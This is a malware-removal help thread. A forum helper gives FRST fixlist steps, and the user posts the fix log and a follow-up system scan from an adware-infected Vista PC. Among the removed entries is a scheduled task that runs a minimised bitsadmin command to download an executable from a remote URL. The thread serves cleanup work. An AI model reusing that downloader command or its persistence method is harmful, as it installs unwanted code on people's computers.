    Task: {7A14E8EA-A987-4687-AA80-8CC58A9C4624} - \RocketTab No Task File 
    Task: {A2A83717-5995-48CA-85DE-4FC74F3D8ED1} - \AmiUpdXp No Task File 
    Task: {B0A2C3D0-4B3B-4591-B037-13F9DF6031F0} - \RocketTab Update Task No Task File 
    Task: {BCE0938D-23E3-4454-B630-F48F50BACE78} - \PennyBee No Task File 
    Task: {C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1} - \Groovorio Updater No Task File 
    Task: {CDCCD7C6-13F9-4525-9576-9B26112FB9EA} - System32\Tasks\amiupdaterExi => C:\Users\Angel\AppData\Local\Temp\amiupdater175.exe 
    Task: {E41555CC-B83C-4225-A5A1-3DA9A104ABC7} - System32\Tasks\Microsoft\Windows\Maintenance\Idle~_~Crawler Update => %LOCALAPPDATA%\Idle~_~Crawler\Idle~_~Crawler.exe 
    EmptyTemp:
    
  • Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please post it to your reply.

After the Reboot:

Step 2

frst.pngfrstscan.png

Start FRST with administator privileges.
  • Make sure the following option is checked: addition.png
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#5 SereneSnake

SereneSnake
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:30 AM

Posted 14 April 2015 - 11:53 PM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 14-04-2015
Ran by Angel at 2015-04-14 23:38:34 Run:1
Running from C:\Users\Angel\Desktop
Loaded Profiles: Angel (Available profiles: Angel)
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKLM\...\Run: [NPSStartup] => [X]
HKLM\...\Run: [mgy0ntk1mjjizdb] => C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe [2391040 2015-02-15] ()
C:\Program Files\Smgy0ntk1mjjizdb
Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction 
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: No Name -> {1FD79A59-37B1-459B-9097-09F9FAB8A523} ->  No File
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
Toolbar: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
R1 mgi0nzk4mjziyjb; C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys [56200 2015-02-15] (NetFilterSDK.com)
C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys 
2015-03-28 21:14 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\Setup642505
2015-03-28 21:13 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\mota
2015-03-22 23:13 - 2015-03-22 23:14 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb(232)
Task: {04D7FA9D-8045-4496-A910-855A2B4FDD46} - \ASP No Task File 
Task: {0C0ACF2A-85AA-457B-B56B-C0FF5A803C48} - \FF Watcher {3186DD48-9E2A-4523-9F9C-5CFCC3C3BC10} No Task File 
Task: {1756FC84-4B84-4489-A32A-89CF57DE0260} - System32\Tasks\amiupdaterExd => cmd.exe /c start /min bitsadmin /transfer amijob /download /priority high http://d17xr4aw9ok0me.cloudfront.net/Updater.exe 
Task: {1E227E50-07C4-4479-ADCD-AF829E565408} - \Mext Guard FBE8818C-5B13-48C2-A93E-AD731167DBF2 No Task File 
Task: {4E8CAF01-3DAC-4A8B-B283-511599629E2C} - \Idle~_~Crawler Runner No Task File 
Task: {7A14E8EA-A987-4687-AA80-8CC58A9C4624} - \RocketTab No Task File 
Task: {A2A83717-5995-48CA-85DE-4FC74F3D8ED1} - \AmiUpdXp No Task File 
Task: {B0A2C3D0-4B3B-4591-B037-13F9DF6031F0} - \RocketTab Update Task No Task File 
Task: {BCE0938D-23E3-4454-B630-F48F50BACE78} - \PennyBee No Task File 
Task: {C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1} - \Groovorio Updater No Task File 
Task: {CDCCD7C6-13F9-4525-9576-9B26112FB9EA} - System32\Tasks\amiupdaterExi => C:\Users\Angel\AppData\Local\Temp\amiupdater175.exe 
Task: {E41555CC-B83C-4225-A5A1-3DA9A104ABC7} - System32\Tasks\Microsoft\Windows\Maintenance\Idle~_~Crawler Update => %LOCALAPPDATA%\Idle~_~Crawler\Idle~_~Crawler.exe 
EmptyTemp:
*****************
 
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\NPSStartup => value deleted successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\mgy0ntk1mjjizdb => value deleted successfully.
C:\Program Files\Smgy0ntk1mjjizdb => Moved successfully.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SDWinLogon" => Key deleted successfully.
C:\Windows\system32\GroupPolicy\Machine => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD79A59-37B1-459B-9097-09F9FAB8A523}" => Key deleted successfully.
HKCR\CLSID\{1FD79A59-37B1-459B-9097-09F9FAB8A523} => Key not found. 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}" => Key deleted successfully.
HKCR\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB} => Key not found. 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => value deleted successfully.
HKCR\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => Key not found. 
mgi0nzk4mjziyjb => Service deleted successfully.
"C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys" => File/Directory not found.
C:\Users\Angel\AppData\Local\Setup642505 => Moved successfully.
C:\Users\Angel\AppData\Local\mota => Moved successfully.
C:\Program Files\Smgy0ntk1mjjizdb(232) => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{04D7FA9D-8045-4496-A910-855A2B4FDD46}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04D7FA9D-8045-4496-A910-855A2B4FDD46}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASP" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0C0ACF2A-85AA-457B-B56B-C0FF5A803C48}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0C0ACF2A-85AA-457B-B56B-C0FF5A803C48}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FF Watcher {3186DD48-9E2A-4523-9F9C-5CFCC3C3BC10}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1756FC84-4B84-4489-A32A-89CF57DE0260}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1756FC84-4B84-4489-A32A-89CF57DE0260}" => Key deleted successfully.
C:\Windows\System32\Tasks\amiupdaterExd => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\amiupdaterExd" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1E227E50-07C4-4479-ADCD-AF829E565408}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1E227E50-07C4-4479-ADCD-AF829E565408}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mext Guard FBE8818C-5B13-48C2-A93E-AD731167DBF2" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4E8CAF01-3DAC-4A8B-B283-511599629E2C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E8CAF01-3DAC-4A8B-B283-511599629E2C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Idle~_~Crawler Runner" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7A14E8EA-A987-4687-AA80-8CC58A9C4624}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A14E8EA-A987-4687-AA80-8CC58A9C4624}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RocketTab" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A2A83717-5995-48CA-85DE-4FC74F3D8ED1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A2A83717-5995-48CA-85DE-4FC74F3D8ED1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AmiUpdXp" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B0A2C3D0-4B3B-4591-B037-13F9DF6031F0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B0A2C3D0-4B3B-4591-B037-13F9DF6031F0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RocketTab Update Task" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BCE0938D-23E3-4454-B630-F48F50BACE78}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BCE0938D-23E3-4454-B630-F48F50BACE78}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PennyBee" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Groovorio Updater" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CDCCD7C6-13F9-4525-9576-9B26112FB9EA}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDCCD7C6-13F9-4525-9576-9B26112FB9EA}" => Key deleted successfully.
C:\Windows\System32\Tasks\amiupdaterExi => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\amiupdaterExi" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E41555CC-B83C-4225-A5A1-3DA9A104ABC7}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E41555CC-B83C-4225-A5A1-3DA9A104ABC7}" => Key deleted successfully.
C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\Idle~_~Crawler Update => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Maintenance\Idle~_~Crawler Update" => Key deleted successfully.
EmptyTemp: => Removed 533.7 MB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog 23:43:15 ====
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 14-04-2015
Ran by Angel (administrator) on ANGEL-PC on 14-04-2015 23:46:39
Running from C:\Users\Angel\Desktop
Loaded Profiles: Angel (Available profiles: Angel)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\AERTSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\Creativity Suite\Event Manager\EEventManager.exe
(Hewlett-Packard Company) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Hewlett-Packard) C:\Windows\System32\hphmon06.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Macrovision Corporation) C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
(Microsoft Corporation) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
(Samsung Electronics Co., Ltd.) C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Hewlett-Packard Co.) C:\Program Files\HP\digital imaging\bin\hpqgalry.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [6265376 2008-08-19] (Realtek Semiconductor)
HKLM\...\Run: [IAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [182808 2008-07-20] (Intel Corporation)
HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128296 2008-05-23] (CyberLink Corp.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [EEventManager] => C:\Program Files\EPSON\Creativity Suite\Event Manager\EEventManager.exe [102400 2005-04-08] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [HPHUPD06] => C:\Program Files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe [49152 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49152 2004-02-12] (Hewlett-Packard Company)
HKLM\...\Run: [HP Component Manager] => C:\Program Files\HP\hpcoretech\hpcmpmgr.exe [241664 2004-05-12] (Hewlett-Packard Company)
HKLM\...\Run: [HPHmon06] => C:\Windows\system32\hphmon06.exe [659456 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-01-20] (Apple Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [978520 2015-01-30] (Microsoft Corporation)
HKLM\...\Run: [SDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-07-08] (Apple Inc.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ISUSPM] => C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [218032 2006-09-11] (Macrovision Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3882312 2008-12-02] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [AutoStartNPSAgent] => C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe [95576 2010-07-04] (Samsung Electronics Co., Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5529880 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\WLXPGSS.SCR [307560 2008-12-04] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\digital imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Image Zone Fast Start.lnk
ShortcutTarget: HP Image Zone Fast Start.lnk -> C:\Program Files\HP\digital imaging\bin\hpqthb08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-04] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-02-21] ()
FF Plugin: @java.com/DTPlugin,version=10.5.1 -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\dtplugin\npDeployJava1.dll [2012-05-04] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @soe.sony.com/installer,version=1.0.3 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\plugins\npsoe.dll No File
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-10-17] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll [2008-06-18] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPTURNMED.dll [2009-03-11] (CNN)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np_gp.dll [2009-09-23] (NOS Microsystems Ltd.)
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\allrecipes.xml [2009-01-16]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\facebook.xml [2012-11-26]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\imdb.xml [2008-11-05]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\punditkitchennetwork.xml [2009-04-08]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\searchcanvas.xml [2014-08-09]
FF Extension: FoxSaver - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\foxsaver@www.foxsaver.com [2011-08-29]
FF Extension: Move Media Player - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\moveplayer@movenetworks.com [2009-02-17]
FF Extension: Tab To Window - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\tabtowindow@sogame.cat [2009-06-15]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-05-01]
FF Extension: IE Tab - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{77b819fa-95ad-4f2c-ac7c-486b356188a9} [2013-06-07]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} [2014-07-13]
FF Extension: Personas Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\personas@christopher.beard.xpi [2013-03-03]
FF Extension: Halloween - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{BB359C50-BFC9-4f40-8302-3FE5A499A859}.xpi [2012-05-07]
FF Extension: Adblock Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2012-05-07]
